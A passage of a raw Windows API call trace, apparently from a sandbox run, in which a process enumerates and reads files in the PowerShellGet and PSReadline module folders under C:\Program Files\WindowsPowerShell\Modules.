| out: lpFileInformation=0x1b7ddcb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4)) returned 1 [0182.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddb90) returned 1 [0182.314] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0182.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd970) returned 1 [0182.315] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6cc [0182.315] GetFileType (hFile=0x6cc) returned 0x1 [0182.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8e0) returned 1 [0182.315] GetFileType (hFile=0x6cc) returned 0x1 [0182.315] ReadFile (in: hFile=0x6cc, lpBuffer=0x21f4f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x21f4f50*, lpNumberOfBytesRead=0x1b7dda48*=0x1000, lpOverlapped=0x0) returned 1 [0182.315] ReadFile (in: hFile=0x6cc, lpBuffer=0x21f4f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x21f4f50*, lpNumberOfBytesRead=0x1b7dda48*=0x1000, lpOverlapped=0x0) returned 1 [0182.316] ReadFile (in: hFile=0x6cc, lpBuffer=0x21f4f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x21f4f50*, lpNumberOfBytesRead=0x1b7dda48*=0x1000, lpOverlapped=0x0) returned 1 [0182.316] ReadFile (in: hFile=0x6cc, lpBuffer=0x21f4f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x21f4f50*, lpNumberOfBytesRead=0x1b7dda48*=0x1000, lpOverlapped=0x0) returned 1 [0182.316] ReadFile (in: hFile=0x6cc, lpBuffer=0x21f4f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x21f4f50*, lpNumberOfBytesRead=0x1b7dda48*=0x1000, lpOverlapped=0x0) returned 1 [0182.317] ReadFile (in: hFile=0x6cc, lpBuffer=0x21f4f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x21f4f50*, lpNumberOfBytesRead=0x1b7dda48*=0xac4, lpOverlapped=0x0) returned 1 [0182.317] ReadFile (in: hFile=0x6cc, lpBuffer=0x21f4554, nNumberOfBytesToRead=0x13c, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x21f4554*, lpNumberOfBytesRead=0x1b7dda48*=0x0, lpOverlapped=0x0) returned 1 [0182.317] ReadFile (in: hFile=0x6cc, lpBuffer=0x21f4f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x21f4f50*, lpNumberOfBytesRead=0x1b7dda48*=0x0, lpOverlapped=0x0) returned 1 [0182.317] CloseHandle (hObject=0x6cc) returned 1 [0182.319] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0182.319] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0182.319] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0182.319] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0182.319] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0182.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.319] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0182.320] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", lpFilePart=0x0) returned 0x36 [0182.320] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x1b7dd7d0 | out: lpFindFileData=0x1b7dd7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6ae0 [0182.320] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.321] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0182.321] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.321] FindClose (in: hFindFile=0x1a9b6ae0 | out: hFindFile=0x1a9b6ae0) returned 1 [0182.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0182.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda40) returned 1 [0182.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.321] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0182.321] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", lpFilePart=0x0) returned 0x36 [0182.321] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x1b7dd7d0 | out: lpFindFileData=0x1b7dd7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6720 [0182.321] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.322] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0182.322] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 0 [0182.322] FindClose (in: hFindFile=0x1a9b6720 | out: hFindFile=0x1a9b6720) returned 1 [0182.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0182.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda40) returned 1 [0182.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd9a0) returned 1 [0182.322] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0182.322] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\", nBufferLength=0x105, lpBuffer=0x1b7dd430, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\", lpFilePart=0x0) returned 0x3a [0182.323] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*", lpFindFileData=0x1b7dd640 | out: lpFindFileData=0x1b7dd640*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b68a0 [0182.323] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.323] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0182.323] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0182.324] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0182.324] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0182.324] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 0 [0182.324] FindClose (in: hFindFile=0x1a9b68a0 | out: hFindFile=0x1a9b68a0) returned 1 [0182.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8f0) returned 1 [0182.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8b0) returned 1 [0182.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd9a0) returned 1 [0182.325] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0182.325] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\", nBufferLength=0x105, lpBuffer=0x1b7dd430, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\", lpFilePart=0x0) returned 0x3a [0182.325] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*", lpFindFileData=0x1b7dd640 | out: lpFindFileData=0x1b7dd640*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b68a0 [0182.325] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.326] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0182.326] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0182.326] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0182.326] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0182.327] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.327] FindClose (in: hFindFile=0x1a9b68a0 | out: hFindFile=0x1a9b68a0) returned 1 [0182.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8f0) returned 1 [0182.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8b0) returned 1 [0182.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd810) returned 1 [0182.327] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0x1b7dd300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0182.327] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\", nBufferLength=0x105, lpBuffer=0x1b7dd2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\", lpFilePart=0x0) returned 0x3d [0182.327] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*", lpFindFileData=0x1b7dd4b0 | out: lpFindFileData=0x1b7dd4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6ae0 [0182.328] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd500 | out: lpFindFileData=0x1b7dd500*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.328] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd500 | out: lpFindFileData=0x1b7dd500*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0182.328] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd500 | out: lpFindFileData=0x1b7dd500*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0182.328] FindClose (in: hFindFile=0x1a9b6ae0 | out: hFindFile=0x1a9b6ae0) returned 1 [0182.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd760) returned 1 [0182.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd720) returned 1 [0182.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd810) returned 1 [0182.329] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0x1b7dd300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0182.329] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\", nBufferLength=0x105, lpBuffer=0x1b7dd2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\", lpFilePart=0x0) returned 0x3d [0182.329] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*", lpFindFileData=0x1b7dd4b0 | out: lpFindFileData=0x1b7dd4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6720 [0182.329] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd500 | out: lpFindFileData=0x1b7dd500*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.330] FindNextFileW (in: 